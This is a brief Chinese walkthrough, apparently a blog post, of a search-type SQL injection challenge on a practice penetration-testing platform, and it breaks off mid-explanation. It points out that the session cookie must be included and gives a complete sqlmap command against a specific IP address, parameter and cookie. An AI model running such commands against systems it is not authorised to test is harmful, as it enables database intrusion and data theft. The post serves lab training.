安銮渗透实战平台-SQL搜索型注入02

安銮渗透实战平台(SQL搜索型注入02)

先进行搜索查看网络请求

在这里插入图片描述发现请求头中有Cookie,且payload中的action字段是静态的(注:使用sqlmap的同学要注意这一点,有cookie记得需要将cookie加入到命令中去,否则会注入失败)

选择sqlmap一把梭

sqlmap -u "http://106.15.50.112:8125/sqli_1.php?title=1&action=search" -p "title" --cookie="security_level=0; PHPSESSID=9jr1e4grvmehurpprao4ke4hv1"

注(-p指定注入参数,由于我们知道action字段是定值所以将title字段指定为注入点,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值